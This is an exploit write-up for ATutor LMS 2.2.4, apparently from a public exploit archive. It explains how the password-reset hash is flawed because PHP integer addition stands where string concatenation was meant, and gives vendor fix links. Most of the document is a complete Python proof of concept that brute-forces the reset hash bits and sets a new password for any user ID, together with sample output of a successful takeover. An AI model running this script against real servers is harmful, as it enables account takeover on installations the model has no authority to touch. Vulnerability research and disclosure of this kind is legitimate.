ATutor LMS 2.2.4 Weak Password Reset Hash

`# Exploit Title: ATutor LMS 2.2.4 - Weak Password Reset Hash  
# Date: 2020-05-05  
# Exploit Author: Hodorsec  
# Version: 2.2.4  
# Software Link: https://atutor.github.io/atutor/downloads.html  
# Vendor Homepage: https://atutor.github.io  
# Tested on: Debian 10 x64 - PHP 7.3.15-3  
  
# Problem:  
# While the original intention of the program was to probably concatenate strings as indicated for the $hash value, this doesn't happen.  
# Instead, due to the left-associativity of the "+" operator, the integers of "id" and "g" are added first.  
# Lastly, the password gets added as integer as well via the "h" SHA1 hashed password, while a SHA1 password doesn't consist of only integers.  
#  
# Analysis:  
# During analysis, it appeared ONLY the first readable numeric digits are added from the SHA1 hash.   
# Numeric digits at the beginning of a random SHA1 string, are being added to the variables "id" and "h".   
# This might have an impact on many requests, if a large numeric prefix is used in a SHA1 hash.  
#  
# Vulnerability:  
# A valid user ID, the UNIX Epoch in days of maximum +2 and a generated number would be sufficient to generate valid hash bits.  
# The hash bits could be attempted to send to the webserver, and if the content contains a valid "change your password" dialog, the attack was successful.  
#  
# Impact:  
# This means any malicious attacker could modify the password of every user, issueing a maximum of 100 requests per user ID.  
#  
# Fix:  
# Appears to be already fixed on the Master branch on Github, however: the 2.2.4 "tar.gz" still contains the unfixed version of "password_reminder.php"  
#  
# Github details:   
# https://github.com/atutor/ATutor/issues/177  
# https://github.com/atutor/ATutor/commit/557dc83071ec36c5ca22a1ea08d57778283905ca  
#  
# Reproduction:  
# EXAMPLE  
# $ python3 poc_atutor_2.2.4_iterate_hashbits.py http 192.168.252.13 80 /ATutor 1 2 password  
# [*] Issueing password change requests to URL: http://192.168.252.13:80/ATutor/password_reminder.php?id=1&g=18385&h=6d520a1dabb8ae6  
# [*] Issueing password change requests to URL: http://192.168.252.13:80/ATutor/password_reminder.php?id=1&g=18385&h=c3300a342a267a4  
# [*] Issueing password change requests to URL: http://192.168.252.13:80/ATutor/password_reminder.php?id=1&g=18385&h=cd255501ba0a052  
# [*] Issueing password change requests to URL: http://192.168.252.13:80/ATutor/password_reminder.php?id=1&g=18385&h=1a9df2a3fad2f0c  
# [*] Issueing password change requests to URL: http://192.168.252.13:80/ATutor/password_reminder.php?id=1&g=18385&h=1450a1414a4107e  
# [*] Issueing password change requests to URL: http://192.168.252.13:80/ATutor/password_reminder.php?id=1&g=18385&h=83618d638c3b1fa  
#  
# [*] SUCCESS: Hashbit 83618d638c3b1fa allows changing password for user ID 1 using 18385 for Epoch days  
# [*] Used 6 number of requests  
#  
# [*] Changing password...  
# [*] Password changed successfully!  
  
#!/usr/bin/python3  
import hashlib,string,itertools,re,sys  
import requests  
import urllib3  
import os  
import time  
import sys  
from random_useragent.random_useragent import Randomize # Randomize useragent  
  
# Optionally, use a proxy  
# proxy = "http://<user>:<pass>@<proxy>:<port>"  
proxy = ""  
os.environ['http_proxy'] = proxy  
os.environ['HTTP_PROXY'] = proxy  
os.environ['https_proxy'] = proxy  
os.environ['HTTPS_PROXY'] = proxy  
  
# Disable cert warnings  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
# Set timeout  
timeout = 3  
  
# URL  
urlpage = "/password_reminder.php"  
  
# Handle CTRL-C  
def keyboard_interrupt():  
"""Handles keyboardinterrupt exceptions"""  
print("\n\n[*] User requested an interrupt, exiting...")  
exit(1)  
  
# Set optional headers  
def http_headers():  
# Randomize useragent  
useragent = Randomize().random_agent('desktop', 'windows')  
# HTTP Headers. Might need modification for each webapplication  
headers = {  
'User-Agent': useragent,  
}  
return headers  
  
def gen_code(id, epoch_day, digits):  
""" Generate a hash_bit, substring of a SHA1 hash based on 'id', 'g' (epoch day) and SHA1 raw-hashed password  
94 $hash = sha1($_REQUEST['id'] + $_REQUEST['g'] + $row['password']);  
95 $hash_bit = substr($hash, 5, 15); """  
codes = []  
chars = range(0,10 ** digits) # Range of numeric digits to use for guessing the SHA1 prefix  
for num in chars:  
to_hash = str(id + epoch_day + num) # Only checks on the first set of numeric occurences in the SHA1 hash  
hash_bit = hashlib.sha1(to_hash.encode()).hexdigest()[5:5+15] # Hash it, Python equivalent of PHP substr(5,15)  
codes.append(hash_bit) # Add the hashbit to the array for testing later on  
return codes  
  
def iterate_hashbits(method, host, port, prefix, id, digits):  
""" Set epochs with a maximum of today + 2  
75 //check if expired  
76 $current = intval(((time()/60)/60)/24);  
77 $expiry_date = $_REQUEST['g'] + AT_PASSWORD_REMINDER_EXPIRY; //2 days after creation """  
current_epoch_days = int(((int(time.time()) / 60) / 60) / 24) # Calculate current Epoch in days  
max_epoch_days = int(current_epoch_days + 2) # Maximum Epoch in days, as hardcoded by Atutor  
  
# Set initial variables  
headers = http_headers() # Reuse the static headers, due to odd behaviour of Atutor changing user-agent between requests  
txt_pass_change = "Enter a new password for your account" # Text to check later if attempt was successfull  
count = 0  
  
# Iterate between today and today + 2  
# Iteration of hashbits  
for epoch_day in range(current_epoch_days, max_epoch_days + 1): # Add one to include stop value for range  
codes = gen_code(id, epoch_day, digits)  
for code in codes:  
url = method + "://" + host + ":" + port + prefix + urlpage + "?id=" + str(id) + "&g=" + str(epoch_day) + "&h=" + code  
print("[*] Issueing password change requests to URL: " + url)  
  
try:  
r = requests.get(url, allow_redirects=False, headers=headers, verify=False, timeout=timeout)  
count += 1  
except requests.exceptions.Timeout:  
print("[!] Timeout error\n")  
except requests.exceptions.TooManyRedirects:  
print("[!] Too many redirects\n")  
except requests.exceptions.ConnectionError:  
print("[!] Not able to connect to URL\n")  
except requests.exceptions.RequestException as e:  
print("[!] " + e)  
except requests.exceptions.HTTPError as e:  
print("[!] Failed with error code - " + e.code + "\n")  
except KeyboardInterrupt:  
keyboard_interrupt()  
  
if txt_pass_change in r.text:  
print("\n[*] SUCCESS: Hashbit " + code + " allows changing password for user ID " + str(id) + " using " + str(epoch_day) + " for Epoch days")  
print("[*] Used " + str(count) + " number of requests\n")  
return [code, epoch_day]  
elif int(r.status_code) != 200:  
print("\n[!] FAIL: " + url + " doesn't seem to respond correctly.\n")  
exit(-1)  
print("\n[!] FAIL: Code not found, something went wrong.\n")  
exit(-1)  
  
def change_pass(method, host, port, prefix, id, code, epoch_day, password):  
""" Set a new password with a valid hashbit as code  
97 if ($_REQUEST['h'] !== $hash_bit) {  
98 $msg->addError('INVALID_LINK');  
99 } else if (($_REQUEST['h'] == $hash_bit) && !isset($_POST['form_change'])) {  
100 $savant->assign('id', $_REQUEST['id']);  
101 $savant->assign('g', $_REQUEST['g']);  
102 $savant->assign('h', $_REQUEST['h']);  
103 $savant->display('password_change.tmpl.php');  
104 }  
"""   
print("[*] Changing password...")  
headers = http_headers()  
url = method + "://" + host + ":" + port + prefix + urlpage  
sha1_pass = hashlib.sha1(password.encode()).hexdigest()  
post_data = {'form_change':'true',  
'id':str(id),  
'h':code,  
'g':str(epoch_day),  
'form_password_hidden':sha1_pass,  
'submit':'Submit'}  
  
try:  
r = requests.post(url, data=post_data, headers=headers, verify=False, timeout=timeout)  
except requests.exceptions.Timeout:  
print("[!] Timeout error\n")  
except requests.exceptions.TooManyRedirects:  
print("[!] Too many redirects\n")  
except requests.exceptions.ConnectionError:  
print("[!] Not able to connect to URL\n")  
except requests.exceptions.RequestException as e:  
print("[!] " + e)  
except requests.exceptions.HTTPError as e:  
print("[!] Failed with error code - " + e.code + "\n")  
except KeyboardInterrupt:  
keyboard_interrupt()  
  
if 'changed' in r.text:  
print("[*] Password changed successfully!\n")  
exit(1)  
else:  
print("[!] Something went wrong changing password.\n")  
exit(-1)  
  
def main():  
if len(sys.argv) != 8:  
print("[+] Usage: " + sys.argv[0] + " <http/https> <host> <port> <url_prefix> <user_id> <digits> <password>\n")  
print("[+] Eg: " + sys.argv[0] + " http 192.168.11.1 80 /ATutor 1 2 Password12345")  
print("[+] Eg: " + sys.argv[0] + " https yourlocalserver.local 443 / 3 4 Someotherpassword\n")  
print("[+] Use the <digits> parameters with caution due to possible excessive amounts of requests, uses 'digit ^ 10' amount of requests. Value 2 would be a nice value to start with.\n")  
exit(-1)  
  
# Set variables  
method = str(sys.argv[1])  
host = str(sys.argv[2])  
port = str(sys.argv[3])  
url_prefix = str(sys.argv[4])  
id = int(sys.argv[5])  
digits = int(sys.argv[6])  
password = str(sys.argv[7])  
  
# Iterate through bits of hashes  
code_epoch = iterate_hashbits(method, host, port, url_prefix, id, digits)  
code = code_epoch[0]  
epoch_day = code_epoch[1]  
change_pass(method, host, port, url_prefix, id, code, epoch_day, password)  
  
if __name__ == "__main__":  
main()  
  
`